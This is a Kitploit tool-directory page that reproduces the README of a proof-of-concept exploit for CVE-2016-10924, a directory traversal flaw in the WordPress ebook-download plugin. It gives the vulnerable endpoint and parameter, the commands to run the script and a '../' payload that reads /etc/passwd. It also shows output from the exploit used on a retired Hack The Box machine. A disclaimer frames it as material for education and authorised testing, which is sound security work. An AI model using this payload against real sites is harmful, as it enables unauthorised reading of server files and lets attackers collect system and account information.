Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2016-10924-POC — Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request. | Kitploit
Tools/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request.

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2016-10924-POC

This repository contains a Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2).

This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called ebookdownloadurl to traverse directories on the target server.

Description

  • CVE-ID: CVE-2016-10924
  • Vulnerability Type: Directory Traversal
  • Affected Component: ebook-download plugin < 1.2 for WordPress
  • Impact: Remote attackers can read arbitrary files on the underlying operating system, such as /etc/passwd, by manipulating the file path in the ebookdownloadurl parameter.

Note: This PoC is for educational and authorized testing purposes only. Misuse of this information can lead to legal consequences.

Requirements

  • Python 3.
  • requests library (install via pip install requests)

Usage

  1. Clone the repository:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Install Dependencies:

    root@kitploit:~
    pip install requests
    
  3. Run the Exploit:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Specify the file path to read: After launching the script, you will be prompted for a file path. For example:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    You may need to adjust the number of ../ based on the webroot location in the target environment.

  5. Exit:

    • Type exit, quit, or press Enter on an empty prompt to exit.
    • Press Ctrl + C to stop the script immediately.

Example

I used this exploit on "Backdoor", a retired Hack The Box machine:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Disclaimer

This project is intended solely for educational and legitimate security testing purposes.
Do not use the information or scripts within this repository on any system you do not have explicit permission to test.
Author and contributors are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the GNU 2.0 License. Feel free to use and modify it, but please give credit.


References

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (for vulnerable versions reference)
Download Tool